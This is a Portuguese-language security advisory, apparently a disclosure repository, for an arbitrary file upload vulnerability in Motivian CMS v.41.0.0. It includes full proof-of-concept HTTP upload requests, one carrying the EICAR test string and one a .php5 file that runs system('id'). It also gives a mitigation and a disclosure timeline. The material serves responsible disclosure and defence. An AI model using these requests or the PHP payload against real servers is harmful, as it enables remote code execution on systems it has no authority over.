
Este repositório revela uma vulnerabilidade de segurança descoberta no Motivian Content Management System v.41.0.0
Este repositório revela uma vulnerabilidade de segurança descoberta no Motivian Content Management System v.41.0.0.
Esta vulnerabilidade foi reportada ao fornecedor de acordo com práticas de divulgação responsável, e ao MITRE, que atribuiu um ID CVE temporário. Os detalhes estão sendo tornados públicos após o término do período de divulgação de 45 dias.
| Título: | Motivian Upload Arbitrário de Arquivo |
| Tipo de Vulnerabilidade: | Upload Arbitrário de Arquivo |
| Fornecedor do Produto: | Motivian |
| Produto: | Motivian Content Management System |
| Versão Afetada: | Motivian CMS v.41.0.0 |
| Componente Afetado: | Content/Gallery/Images |
| Vetor de Ataque: | Remoto |
| Impacto: | Upload malicioso arbitrário de arquivo |
| Severidade: | Médio |
| Pontuação CVSSv3: | 6.5 |
| Vetor CVSSv3: | CVSS:3.1:AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N |
| Severidade por CISA-ADP: | Alto |
| Pontuação CVSSv3 por CISA-ADP: | 8.2 |
| Vetor CVSSv3 por CISA-ADP: | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N |
| Descoberta em: | 2025-02-03 |
| Por: | Francesco Marcuccio |
| Status: | Reportado ao fornecedor em 7 de abril de 2025 - Nenhuma resposta/correção recebida até 22 de maio de 2025 |
Uma vulnerabilidade de Upload de Arquivo no Motivian Content Management System v.41.0.0 permite que um atacante remoto faça upload de arquivos arbitrários com extensões manipuladas (ex.: .php, .png, .txt) contendo código malicioso, através do componente Content/Gallery/Images.
A vulnerabilidade pode ser explorada ao fazer upload de arquivos com várias extensões. Para fins de demonstração, dois casos de prova de conceito foram usados: um envolvendo um arquivo .php contendo código malicioso, e outro usando um arquivo .txt com a string de teste EICAR. Ambos os arquivos foram carregados através do componente Content/Gallery/Images.
Abaixo está a transcrição completa das requisições e respostas HTTP usadas para demonstrar o problema:
POST /portal/admin/cms/browseManageCmsResources!uploadFile.action HTTP/1.1
Host: [REDACTED]
Content-Length: 808
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary2oYL3KVZBlAQmYAA
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: [REDACTED]
Connection: close
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="resFolderId"
-8
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="allowedExtensions"
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="hidePageComponents"
false
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="struts.token.name"
token
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="token"
M53N7SE0QE1Z4MZV4BRV59QW3TSEZ962
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="uploadResource"; filename="eicar.txt"
Content-Type: text/plain
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
------WebKitFormBoundary2oYL3KVZBlAQmYAA--
POST /portal/admin/cms/browseManageCmsResources!uploadFile.action HTTP/1.1
Host: [REDACTED]
Content-Length: 789
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLdWSMj4ASbAC9uOz
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: [REDACTED]
Connection: close
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="resFolderId"
304802
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="allowedExtensions"
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="hidePageComponents"
false
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="struts.token.name"
token
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="token"
77PMJUJH5ZAQTPWRG5TQCLIOR9CUBK0M
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="uploadResource"; filename="test.php5"
Content-Type: application/octet-stream
<?php
echo system('id');
?>
------WebKitFormBoundaryLdWSMj4ASbAC9uOz--
HTTP/1.1 200 OK
Connection: close
Date: Thu, 06 Feb 2025 10:26:29 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Language: it-IT
Content-Length: 16729
Não permita que usuários façam upload de arquivos arbitrários. Implemente validação rigorosa de arquivos (inspeção de tipo MIME e conteúdo), randomize nomes de arquivos e restrinja diretórios de upload.
| Data | Ação |
|---|---|
| 2025-02-06 | Solicitação de ID CVE (CNA: MITRE) |
Descoberta e divulgada de forma responsável por:
Francesco Marcuccio
Consultor de Segurança Cibernética, Penetration Tester
Atribuição do descobridor no MITRE listado como:
Francesco Marcuccio
Consultor de Segurança Cibernética, Penetration Tester
Links de referência: MITRE NIST
Este ID CVE está oficialmente no status PUBLICADO. Será atualizado com pontuação CVSS pelo NIST, após análise.
| 2025-04-02 |
| Atribuição de ID CVE |
| 2025-04-07 | Vulnerabilidades reportadas ao fornecedor |
| 2025-05-31 | Divulgação pública após o término do período de divulgação de 45 dias (54 dias no total) |
| 2025-06-04 | Registro oficial e entrada no banco de dados MITRE e portal NIST/NVD |